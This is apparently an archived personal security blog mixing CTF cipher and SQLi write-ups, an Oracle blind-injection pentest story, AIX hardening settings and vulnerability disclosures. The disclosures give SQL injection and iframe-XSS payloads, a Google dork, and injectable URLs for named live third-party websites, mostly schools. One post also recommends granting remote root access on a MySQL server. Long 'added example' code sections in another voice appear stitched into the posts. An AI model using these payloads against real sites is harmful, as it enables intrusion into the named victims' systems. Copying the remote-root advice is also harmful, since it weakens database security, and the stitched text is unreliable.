Sunday, June 3, 2012

Wargames.My 2011 - crypto200


Above is the ciphered text given to the players. What do the players need to do? Decode it, simple :P Google Images for "logo cipher" or "code image" and you'll find lots of images, each with its own cipher alphabet. Find the one that looks like crypto200.png. There are a few you can shortlist: 1 - freemason cipher 2 - pigpen cipher 3 - more.. I chose the pigpen cipher since that's the most similar to crypto200.png.. My friend said it is ok to choose either one, since the next step after deciphering this cipher is the real challenge. Once decoded to words, this is what I got:
ndeunf ofqugzdg cdru kuus zdpul
dsl giyisp uatvsuseiannf ev kgisp
lvzs ovgghtecl pvrugswusey dsl eh
ogudeu egdsytdgusof dsl kgispisp
tvzug kdom ev ecu tuvtnu!zlugu
ecugu iy sv riyivs,ecu tuvtnu zinn
tugiyc

svz dsyzug;zcioc pgvht zdy gfds
onudgf doohyul vx ev ku dyyvoideul
ziec?wl5 ecudsyzug dsl yhkwie ecu
yhw.ecde iy fvhgxnp.
End? Not yet! You still need to decode the 2nd cipher, a Substitution Cipher! Here's a wikilink for this cipher. How does this cipher work? Here's an example: rabbit - a real word. The person who wants to send this message wants to cipher it, so he substitutes letters r = x, a = w, b = e, i = k, t = u, so rabbit, once ciphered, becomes xweeku. So, how do you get the real answer for this challenge? Reverse the decoded words up there :P Thanks.
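As an added example (not code from the original post), here is the substitution step in Python: the partial key from the rabbit/xweeku illustration applied in both directions, plus a letter-frequency count over the pigpen output above, which is the usual first step when the substitution key is unknown (the most frequent ciphertext letter is the first candidate for plaintext 'e'). The key mapping and the frequency threshold are the only assumptions; the ciphertext is the one printed in the post.

```python
# Added example: monoalphabetic substitution with the post's partial key,
# and a frequency count to guide solving an unknown key by hand.
from collections import Counter

# Partial key from the post: r->x, a->w, b->e, i->k, t->u
RABBIT_KEY = {'r': 'x', 'a': 'w', 'b': 'e', 'i': 'k', 't': 'u'}

def substitute(text, key):
    """Replace every letter present in key; letters not in the key and
    punctuation pass through unchanged (lower-case only, like the challenge)."""
    return ''.join(key.get(ch, ch) for ch in text.lower())

def invert(key):
    """Swap the plaintext/ciphertext sides so substitute() can decrypt."""
    return {cipher: plain for plain, cipher in key.items()}

def letter_frequencies(ciphertext):
    """Count a-z only, ignoring spaces, digits and punctuation."""
    return Counter(ch for ch in ciphertext.lower() if 'a' <= ch <= 'z')

def most_common_letters(ciphertext, n=5):
    """The n most frequent ciphertext letters with their counts. English
    plaintext is dominated by e, t, a, o, i, n, so these are the letters
    to try first when guessing the substitution key."""
    return letter_frequencies(ciphertext).most_common(n)

# The pigpen output quoted in the post, used as the frequency-analysis input
CHALLENGE_TEXT = """ndeunf ofqugzdg cdru kuus zdpul
dsl giyisp uatvsuseiannf ev kgisp
lvzs ovgghtecl pvrugswusey dsl eh
ogudeu egdsytdgusof dsl kgispisp
tvzug kdom ev ecu tuvtnu!zlugu
ecugu iy sv riyivs,ecu tuvtnu zinn
tugiyc

svz dsyzug;zcioc pgvht zdy gfds
onudgf doohyul vx ev ku dyyvoideul
ziec?wl5 ecudsyzug dsl yhkwie ecu
yhw.ecde iy fvhgxnp."""

if __name__ == '__main__':
    print(substitute('rabbit', RABBIT_KEY))           # xweeku
    print(substitute('xweeku', invert(RABBIT_KEY)))   # rabbit
    for letter, count in most_common_letters(CHALLENGE_TEXT):
        print(letter, count)
```

Running it shows that 'u' is by far the most frequent ciphertext letter, which is exactly the kind of foothold the second stage of the challenge expects you to find before filling in the rest of the key by hand.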

Tuesday, May 29, 2012

Wargames.My 2011 - crypto100

Crypto100
Players were given this code.


fvrwslwslswhgacsremfberbubgrihgbtvi


Hint given was: I like big, long and yellow
The first thing that came to my mind once I read the hint was banana!!.. so the answer/passphrase should be monkey.

I googled a little bit about the types of ciphers that need a passphrase/key to decrypt.
I found Vigenère ciphers. Then I tried an online cracker to crack it, and voilà~ lucky me :D
Flag is = themonkeyisjumpingaroundinthejungle


Here's a Python script made by johnburn to solve this challenge. It's a dictionary attack, btw.

#!/usr/bin/env python
# Dictionary attack on a Vigenere ciphertext: try every word in wordlist.txt
# as the key and stop at the first decryption that looks like English.
charset = 'abcdefghijklmnopqrstuvwxyz'
encoded = 'fvrwslwslswhgacsremfberbubgrihgbtvi'

with open("wordlist.txt", "r") as keys:
    for key in keys.read().split('\n'):
        key = key.strip().lower()
        # skip blank lines and words with characters outside a-z
        if not key or any(c not in charset for c in key):
            continue
        message = ''
        for i in range(len(encoded)):
            p = charset.index(encoded[i])
            k = charset.index(key[i % len(key)])
            # Vigenere decryption: shift each letter back by the key letter
            message += charset[(p - k) % len(charset)]
        # crude English check: the plaintext must contain 'the' more than once
        if message[:-2].count('the') > 1:
            print('The key: ' + key)
            print('The message: ' + message)
            break
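As an added example (not the post's or johnburn's code), the same Vigenère attack written so the key is scored rather than matched against a fixed count of "the": every candidate key is tried, the decryption is scored by common English fragments, and the best-scoring key wins. The wordlist is a constructed stand-in for wordlist.txt, and the n-gram scoring table is an assumption of this example, not something from the challenge.

```python
# Added example: Vigenere encrypt/decrypt and a score-based dictionary attack.
import string

ALPHABET = string.ascii_lowercase
CIPHERTEXT = 'fvrwslwslswhgacsremfberbubgrihgbtvi'   # from the challenge

def vigenere(text, key, decrypt=False):
    """Shift each letter by the matching key letter (mod 26).
    Only a-z is handled, which matches the challenge input."""
    out = []
    for i, ch in enumerate(text):
        shift = ALPHABET.index(key[i % len(key)])
        if decrypt:
            shift = -shift
        out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
    return ''.join(out)

# Common English fragments; each hit adds its length to the score, so a text
# full of 'the', 'ing', 'and' outscores one that matches a bigram by accident.
COMMON_NGRAMS = ('the', 'and', 'ing', 'ion', 'ent',
                 'is', 'in', 'on', 'er', 'an')

def english_score(text):
    return sum(len(ng) * text.count(ng) for ng in COMMON_NGRAMS)

def dictionary_attack(ciphertext, wordlist):
    """Return (best_key, plaintext) for the highest-scoring key in wordlist.
    Blank entries and keys with characters outside a-z are skipped instead of
    crashing the loop (the original script dies on an empty trailing line)."""
    best = (None, '', -1)
    for key in wordlist:
        key = key.strip().lower()
        if not key or any(c not in ALPHABET for c in key):
            continue
        plain = vigenere(ciphertext, key, decrypt=True)
        score = english_score(plain)
        if score > best[2]:
            best = (key, plain, score)
    return best[0], best[1]

# Constructed wordlist standing in for wordlist.txt
SAMPLE_WORDLIST = ['banana', 'yellow', 'jungle', 'monkey', 'gorilla', '']

if __name__ == '__main__':
    key, plain = dictionary_attack(CIPHERTEXT, SAMPLE_WORDLIST)
    print(key, plain)   # monkey themonkeyisjumpingaroundinthejungle
```

Scoring instead of breaking on the first "the" means a wrong key that happens to contain "the" twice cannot stop the search early, and the function returns something useful even when no key is a perfect match.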

Wargames.My 2011 - writeups

This year there'll be another online CTF game, a.k.a. wargames, in Malaysia. Thanks to the hackerspace community + TheSexyKambing
http://wargames.my/wgmy2012/
Last year, the game was dominated by Kueytiow. He/she managed to solve two binary bonus challenges, which let him start the game in a comfort zone.
You can view last year's results here:
result

So for those who are interested in joining this year's wargames, do register ASAP.

In my blog I'm gonna share with you some of the writeups for the previous challenges.

Web100
Available on the wargames website: web100 writeups

Forensic200
OHMAIGAWD! It seems like we've been hacked! But what did the hackers steal? From the logs, it seems like they exploited an SQL injection bug on our website. Help us find the name of the database that they stole and we shall reward you handsomely.
So players were given a log to analyze. You can get it here
From the logs, the attacker just used an automated tool, sqlmap, to exploit the web app. The injection used the blind technique. If you are good enough at blind SQL injection, you should get the flag in less than a minute :) Good luck.
Flag = wgmy2011
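As an added example (not part of the write-up, and not the challenge's log), this is the forensic side of the job: reading the database name back out of the web server log. A boolean-based blind tool leaves one request per comparison, each narrowing the byte at one position, and the response size separates TRUE pages from FALSE ones. The log lines below are constructed to imitate that pattern (URL-encoded ORD(MID(...))>N comparisons, 5120-byte TRUE pages, 1024-byte FALSE pages); the constant TRUE_SIZE and the Apache-style line format are assumptions of the example.

```python
# Added example: rebuild what a boolean-based blind SQL injection extracted,
# using only the access log. All log lines here are constructed samples.
import re
from urllib.parse import unquote

CONSTRUCTED_LOG = """\
10.0.0.5 - - [20/Nov/2011:10:01:01 +0800] "GET /index.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Nov/2011:10:01:02 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C1%2C1%29%29%3E100 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Nov/2011:10:01:02 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C1%2C1%29%29%3E120 HTTP/1.1" 200 1024
10.0.0.5 - - [20/Nov/2011:10:01:03 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C1%2C1%29%29%3E118 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Nov/2011:10:01:03 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C1%2C1%29%29%3E119 HTTP/1.1" 200 1024
10.0.0.5 - - [20/Nov/2011:10:01:04 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C2%2C1%29%29%3E100 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Nov/2011:10:01:04 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C2%2C1%29%29%3E104 HTTP/1.1" 200 1024
10.0.0.5 - - [20/Nov/2011:10:01:05 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C2%2C1%29%29%3E102 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Nov/2011:10:01:05 +0800] "GET /index.php?id=1%20AND%20ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C2%2C1%29%29%3E103 HTTP/1.1" 200 1024
"""

TRUE_SIZE = 5120   # constructed: byte size of the page when the condition held

LOG_RE = re.compile(r'"GET (?P<path>\S+) HTTP/[\d.]+" \d{3} (?P<size>\d+)')
# expr = the SQL being read out, pos = character position, n = threshold
CMP_RE = re.compile(r'ORD\(MID\((?P<expr>.+?),(?P<pos>\d+),1\)\)>(?P<n>\d+)', re.I)

def parse_comparisons(log_text):
    """Yield (expr, position, threshold, condition_was_true) per probe request;
    lines without a comparison (normal traffic) are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        c = CMP_RE.search(unquote(m.group('path')))   # decode %28 etc. first
        if not c:
            continue
        yield (c.group('expr'), int(c.group('pos')), int(c.group('n')),
               int(m.group('size')) == TRUE_SIZE)

def reconstruct(log_text):
    """Replay the attacker's binary search: each TRUE '>n' raises the lower
    bound to n+1, each FALSE lowers the upper bound to n. Returns the
    recovered string per expression; '?' marks a byte the log never pinned down."""
    bounds = {}   # (expr, pos) -> [lo, hi]
    for expr, pos, n, truth in parse_comparisons(log_text):
        lo, hi = bounds.setdefault((expr, pos), [0, 255])
        if truth:
            lo = max(lo, n + 1)
        else:
            hi = min(hi, n)
        bounds[(expr, pos)] = [lo, hi]
    results = {}
    for (expr, pos), (lo, hi) in sorted(bounds.items()):
        results[expr] = results.get(expr, '') + (chr(lo) if lo == hi else '?')
    return results

if __name__ == '__main__':
    for expr, value in reconstruct(CONSTRUCTED_LOG).items():
        print(expr, '=>', value)   # (SELECT DATABASE()) => wg
```

On a real log you would set TRUE_SIZE from a known-good request (the first line above) and expect the tool to use many more steps per character; the interval logic does not care how many, only that the final bounds meet.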

more will be in my next post...hopefully :P

Friday, April 20, 2012

Advance Oracle Blind SQL Injection

Had a job to test an application a few days back. It's an application using a Java applet.
Hurm.. when I heard it's an application via a Java applet, what came to my mind was

1 - Internet Explorer will be the better browser
*which is true in this case.. since to use another browser I need to install Java Jinitiator (something like that)
*no extra addons such as HackBar/Tamper Data available in IE

2 - Try to hook it using proxy tools: Burp/Paros/WebScarab/ZAP etc.
*Success, but no use, since the data is well encrypted. Failed to crack/reverse it :(
*Tried to use JavaSnoop. Failed to set it up. hahaha

3 - Manual testing!!!
* The best choice.

The developers of this application were really confident in their application. They had already guaranteed that there's no bug in it. So that's why the company that hired them asked me to test the application..

So, after testing it for the 1st day.. it is true the application is hard to hack.. not because of the application, but because of the Java applet.
How about the application then? LOTS of vulnerabilities.
I found multiple forms vulnerable to Oracle blind SQL injection.

Then came another problem.
Most of the forms only accept a small number of characters. Some of them accept 30 chars.. some of them 40 chars.. the longest acceptable input is 90 chars, which I found in one of the vulnerable forms.

It is a BLIND SQLi with a limit on the number of characters.

At first I informed the company about this, but then one of the developers said..
"So what?..You cannot extract anything just by that 1 or 1=1 1=2 thing right?haha"

Really pissed me off. So I needed to extract something from this blind SQLi to show the impact to this developer guy.

A little reading and googling found that, for blind SQLi in Oracle, we need a lot of chars to successfully extract the data.
The only hope I have now is the only form that accepts 90 chars.

So how am I confident it is a blind SQLi?
Simple.
When I try to search for " john ", john's profile appears.
But if I try to search for " john' ", a different profile or a blank profile appears.

So I tried
john' or 1='1 TRUE
john' or 1='2 FALSE

Yerp! It is a blind SQLi.

Had a read of the pentestmonkey cheat sheet and found out that we can use this as well, called string concatenation:


jo'||'hn = TRUE
jo'||hn = FALSE
jo'||h||'n = TRUE

So here's the idea.

jo'|| INJECTION HERE if TRUE 'h' else 'x' || 'n

- let's say we query to find whether the first letter of current_user is 'U'; if the current_user's first letter starts with U, the result will be 'h', which completes the string, equal to jo'||h||'n
- if the 1st letter does not start with U, it will be the else branch, 'x'.. so the string becomes jo'||x||'n, which is not a valid profile available in the application.

hope you get the idea :)
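As an added example (not from the post), the concatenation trick replayed against a throwaway in-memory SQLite database next to the parameterized query that stops it. SQLite understands Oracle's || operator and CASE ... END, so the TRUE/FALSE behaviour described above can be reproduced offline; the profiles table, its rows and the probe conditions are all constructed for the example, and the concatenated letter is quoted ('h') the way the CASE form in the post does it.

```python
# Added example: string-concatenation blind SQLi versus a bound parameter,
# demonstrated on SQLite as a stand-in for Oracle. Table and rows constructed.
import sqlite3

def make_db():
    db = sqlite3.connect(':memory:')
    db.execute("CREATE TABLE profiles (name TEXT, role TEXT)")
    db.executemany("INSERT INTO profiles VALUES (?, ?)",
                   [('john', 'staff'), ('jane', 'admin')])
    return db

def search_vulnerable(db, term):
    """The pattern under test: user input pasted straight into the SQL string.
    A SQL error (as jo'||hn produces) yields no profile, which is exactly the
    blank page the post treats as FALSE."""
    sql = "SELECT name FROM profiles WHERE name = '" + term + "'"
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error:
        return []

def search_safe(db, term):
    """Bound parameter: the quote and the || arrive as data, never as SQL,
    so jo'||'hn is looked up literally and matches nobody."""
    return [row[0] for row in db.execute(
        "SELECT name FROM profiles WHERE name = ?", (term,))]

def oracle_probe(db, condition_sql):
    """The post's jo'|| CASE ... ||'n idea: a true condition completes 'john'
    and shows his profile, a false one builds 'joxn' and shows nothing.
    The whole probe fits comfortably inside a 90-character input limit."""
    term = "jo'||(CASE WHEN " + condition_sql + " THEN 'h' ELSE 'x' END)||'n"
    return search_vulnerable(db, term) == ['john']

if __name__ == '__main__':
    db = make_db()
    print(search_vulnerable(db, "jo'||'hn"))   # ['john']  concatenation ran
    print(search_safe(db, "jo'||'hn"))         # []        treated as a literal
    print(oracle_probe(db, "(SELECT COUNT(*) FROM profiles) = 2"))   # True
    print(oracle_probe(db, "(SELECT COUNT(*) FROM profiles) = 3"))   # False
```

The point for the developer in the story is the last two lines: every yes/no question the attacker can phrase in SQL becomes one "john or not john" lookup, and the only change that makes the probe return [] is moving the input into a bound parameter.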

thanks to
-pentestmonkey
-Bojan Zdrnja

Thursday, January 26, 2012

VKDownloader Python Script

VK is the largest European social network with more than 100 million active users. It's similar to Facebook. There's a video section where we can stream or download videos.
Here's a simple Python script to grab the download link for the video you want.

#!/usr/bin/env python
# Grab the direct video links from a VK video page.

import sys
import re
try:
    from urllib.request import urlopen   # Python 3
except ImportError:
    from urllib2 import urlopen          # Python 2

if len(sys.argv) < 2:
    print("""
      ## Usage : python vkdownloader.py "Url" ##
      --------------------------------------
        ## by p0pc0rn 2012 ##
    """)
    sys.exit(0)

url = sys.argv[1]

# The page embeds the three pieces of the download link as JavaScript variables.
find_host = re.compile(r"var video_host = '(.*?)';")
find_uid = re.compile(r"var video_uid = '(.*?)';")
find_vtag = re.compile(r"var video_vtag = '(.*?)';")

# Fetch the page once (not three times) and search all three patterns in it.
data = urlopen(url).read().decode('utf-8', 'replace')
host = find_host.search(data)
uid = find_uid.search(data)
vtag = find_vtag.search(data)

if not (host and uid and vtag):
    print('Could not find the video variables in the page; is this a VK video URL?')
    sys.exit(1)

base = host.group(1) + 'u' + uid.group(1) + '/video/' + vtag.group(1)
print('Download link for 360p => ' + base + '.360.mp4')
print('Download link for 480p => ' + base + '.480.mp4')
print('Download link for 720p => ' + base + '.720.mp4')

Save the code as vkdownloader.py. You'll need Python, of course, to run the script :)

How to use?
1 - Grab the video URL by right-clicking on the video and copying the URL.

2 - Paste the link as instructed in the script.

3 - The results will appear for the 360, 480 and 720 versions. (Not all videos support the higher resolutions.)

4 - Copy the link and you can download it using your download manager.


Thanks,
p0pc0rn

Tuesday, January 24, 2012

Auditing MySQL Server Using Nmap

What you really need on your local PC:
1 - nmap installed
2 - mysql-audit.nse, which can be downloaded here
3 - mysql-cis.audit, which can be downloaded here

Before proceeding, you need to ensure that the server already allows your IP for checking. How?
Ask the server owner/admin to grant access to your IP. A simple method is like below:

$ mysql -u root -p
Enter password:

mysql> use mysql

mysql> GRANT ALL ON *.* to root@'your-pc-ip' IDENTIFIED BY 'your-root-password';

mysql> FLUSH PRIVILEGES;

Once done, now you can proceed with nmapping (the script argument is mysql-audit.username; the audit file path is the default Nmap install location on Windows):
C:\Users\user0s>nmap -p 3306 192.168.56.101 --script mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='mysql-password',mysql-audit.filename='C:\Program Files\Nmap\nselib\data\mysql-cis.audit'"

Thanks to Patrik Karlsson for his contribution of this nmap script :)

Wednesday, December 21, 2011

AIX IP Stack Tuning

Had problems during an AIX server assessment/hardening recently. After a few Googles, I found this great blog
http://www.cymru.com
which helped a lot in my assessment.

1. TCP send and receive spaces

The TCP send and receive spaces directly affect the TCP window size parameter. An increased window size will allow for more efficient transfers, particularly bulk transfers such as FTP and HTTP. The default for each is not optimal and should be increased to 32768 bytes. This value should not be increased above 64K bytes unless the implications of RFC1323 and RFC2018 are fully understood and support for both is enabled.

Do not enable RFC1323 without also enabling support for RFC2018. Remember, pipe drain is a Bad Thing[tm].

A. AIX
    /usr/sbin/no -o tcp_sendspace=32768
    /usr/sbin/no -o tcp_recvspace=32768

2. Socket queue defense against SYN attacks

While great effort is undertaken to defend any network from those with malicious intent, several ports (largely TCP) must remain open to conduct business. Internet vandals may attempt to exploit these ports to launch a denial of service attack. One of the most popular attacks remains the SYN flood, wherein the socket queue of the attacked host is overwhelmed with bogus connection requests. To defend against such attacks, certain UNIX variants maintain separate queues for inbound socket connection requests. One queue is for half-open sockets (SYN received, SYN|ACK sent), the other queue for fully-open sockets awaiting an accept() call from the application. These two queues should be increased so that an attack of low to moderate intensity will have little to no effect on the stability or availability of the server.

A. AIX
    /usr/sbin/no -o clean_partial_conns=1
    This setting will instruct the kernel to randomly remove half-open sockets from the q0 queue to make room for new sockets.


3. Redirects

A miscreant can use IP redirects to modify the routing table on a remote host. In a well-designed network, redirects to the end stations should not be required. Both the sending and accepting of redirects should be disabled.

A. AIX
    /usr/sbin/no -o ipignoreredirects=1
    /usr/sbin/no -o ipsendredirects=0

4. ARP cleanup

It is possible for a miscreant to cause resource exhaustion or performance degradation by filling the IP route cache with bogus ARP entries. In Solaris, there are two parameters that govern the cleanup interval for the IP route cache. For unsolicited ARP responses, the parameter to be tuned is arp_cleanup_interval. In AIX, the cleanup interval is governed by the value of arpt_killc. However, this parameter governs both solicited and unsolicited ARP entries. For this reason, it is likely best to leave the parameter at the default setting of 20 minutes.

A. AIX
    /usr/sbin/no -o arpt_killc=20


5. Source routing

With source routing, an attacker can attempt to reach internal IP addresses - including RFC1918 addresses. It is important to disable the acceptance of source routed packets to prevent subtle probes of your internal networks.

A. AIX
    /usr/sbin/no -o ipsrcroutesend=0
    Disable the sending of source routed packets.

    /usr/sbin/no -o ipsrcrouteforward=0
    This is important if the box is routing, e.g. a firewall. Disable this feature to prevent the host from forwarding source routed packets.


6. TIME_WAIT setting

On a busy web server, many sockets may linger in the TIME_WAIT state. This is caused by improperly coded client applications that do not properly shut down a socket. This can also be used as a type of DDoS attack.

A. AIX
    No tuning recommendations.


7. Broadcast ECHO response

Smurf attacks work by sending ICMP type 8, code 0 (ECHO REQUEST) messages to a broadcast address from a spoofed address. Some IP stacks will respond, by default, to such messages. This should be disabled. Further, if the host is a firewall (router), it should not propagate directed broadcasts.

A. AIX
    /usr/sbin/no -o directed_broadcast=0
    Do not respond to directed broadcasts.

8. Other broadcast probes

There are two other broadcast probes that a miscreant could utilize against a network. The address mask query can be used to map out the size of the netblock, and set a range for further probes. The timestamp broadcast is another means of mapping and fingerprinting hosts.

A. AIX
    /usr/sbin/no -o icmpaddressmask=0
    Prevent address mask queries.
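As an added example (not from the post or the cymru page), a small compliance check that compares the current AIX network options against the values listed above and prints the `/usr/sbin/no -o` commands needed to close each gap. The sample output is constructed; that `no -a` prints one "name = value" line per option is an assumption about the command's format, and on a real box you would feed it the actual output (`/usr/sbin/no -a`) instead of the sample.

```python
# Added example: check `no -a` output against the hardening values above.
# SAMPLE_NO_OUTPUT is constructed; the "name = value" format is assumed.
RECOMMENDED = {
    'tcp_sendspace': 32768, 'tcp_recvspace': 32768,   # 1. TCP spaces
    'clean_partial_conns': 1,                         # 2. SYN queue defense
    'ipignoreredirects': 1, 'ipsendredirects': 0,     # 3. Redirects
    'arpt_killc': 20,                                 # 4. ARP cleanup (default)
    'ipsrcroutesend': 0, 'ipsrcrouteforward': 0,      # 5. Source routing
    'directed_broadcast': 0,                          # 7. Broadcast ECHO
    'icmpaddressmask': 0,                             # 8. Address mask probes
}

SAMPLE_NO_OUTPUT = """\
         tcp_sendspace = 16384
         tcp_recvspace = 16384
   clean_partial_conns = 0
     ipignoreredirects = 1
       ipsendredirects = 1
            arpt_killc = 20
        ipsrcroutesend = 1
     ipsrcrouteforward = 1
    directed_broadcast = 1
       icmpaddressmask = 0
               tcp_ttl = 60
"""

def parse_no_output(text):
    """Turn 'name = value' lines into {name: int}; non-numeric values are kept
    out so a comparison never silently succeeds on a string."""
    values = {}
    for line in text.splitlines():
        if '=' not in line:
            continue
        name, _, value = line.partition('=')
        name, value = name.strip(), value.strip()
        if value.lstrip('-').isdigit():
            values[name] = int(value)
    return values

def find_deviations(current, recommended=RECOMMENDED):
    """{param: (current_or_None, recommended)} for every setting that is
    missing or differs. A missing parameter is reported, not ignored, since
    an option that `no` does not list cannot be assumed hardened."""
    return {p: (current.get(p), want)
            for p, want in recommended.items() if current.get(p) != want}

def remediation_commands(deviations):
    """The `no -o` lines from the post, one per deviation, in a stable order."""
    return ['/usr/sbin/no -o %s=%s' % (p, want)
            for p, (_, want) in sorted(deviations.items())]

if __name__ == '__main__':
    devs = find_deviations(parse_no_output(SAMPLE_NO_OUTPUT))
    for p, (cur, want) in sorted(devs.items()):
        print('%-20s current=%s recommended=%s' % (p, cur, want))
    print('\n'.join(remediation_commands(devs)))
```

Note that `no -o` on its own changes the running kernel only; on AIX 5.3 and later add `-p` (`no -p -o name=value`) so the setting also survives a reboot, and re-run the check afterwards rather than trusting the change script.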


Other references that might help during AIX assessment/hardening

http://abstractinitiative.com/PerformanceJungle/2009/09/aix-security-hardening-script/
http://publib.boulder.ibm.com
http://www.boran.com/security/sp/aix_hardening.html
http://www.ncftp.com/ncftpd/doc/misc/ephemeral_ports.html
http://slashzeroconf.wordpress.com/2008/01/20/unix-password-selection-expiration/

Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

Title      :    hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor    :  http://www.hileytech.com
Links    :    http://www.hileytech.com/cartspec.html
Type     :    Web Application


The 'prod' parameter of proddetail.php in hileyTECH Ecommerce Cart Pro is vulnerable to SQL injection.
Proof of concept:

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~

Wednesday, November 2, 2011

Wordpress Plugin youtube-uploader Vulnerable to XSS

Title : Wordpress Plugin youtube-uploader Vulnerable to XSS
Dork  : inurl:"youtube-uploader/action.php?action="
by      : p0pc0rn


http://site.com/wp-content/plugins/youtube-uploader/action.php?action=[xss]


~/p0pc0rn/~

Saturday, October 22, 2011

Light & Shade Creative Studio web design multiple sql injections

Title : Light & Shade Creative Studio web design multiple sql injections
Found : 22 October 2011
Web   : http://www.lnsstudio.com/


[sql]
1 - articles-detail.php?aid=[sql]
2 - notice_detail.php?nid=[sql]
3 - photogallery.php?aid=[sql]
4 - alumni-details.php?batch=[sql]
5 - alumni_students.php?batch=[sql]
6 - more..

Examples :
http://www.fhss.edu.np/articles-detail.php?aid=9'
http://www.shangri-la.edu.np/notice_detail.php?nid=3'
http://www.ops.edu.np/notice_details.php?nid=17'


~/p0pc0rn/~

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities
Found : 22 October 2011
Web   : http://www.dreamsandideas.com


[sql]
1 - products.php?CatID=[sql]
2 - news_details.php?nid=[sql]
3 - success_story_details.php?sid=[sql]
4 - inside.php?id=[sql]
5 - contact.php?id=[sql]
6 - visaupdate_details.php?vid=[sql]
7 - products.php?BrandID=[sql]
8 - more..

Examples :

http://www.alfabetaedu.com/news_details.php?nid=31'
http://www.neoteric.com.np/products.php?BrandID=2'
http://www.cybersansar.com/article_list.php?pageno=1
POST frdate=2011-10-22&todate=2011-10-22&list_article=-Select-&keyword='&Submit=Submit
http://www.enasha.com/bnb_profile.php?pid=148'


[xss]

1 - search.php
2 - search_result.php?mk=

Examples :
http://www.afn.org.np/search.php
POST keyword=<iframe src=http://www.1337day.com />&search.x=0&search.y=0
http://www.enasha.com/search_result.php?mk=Toyota<iframe src=http://www.1337day.com />



~/p0pc0rn/~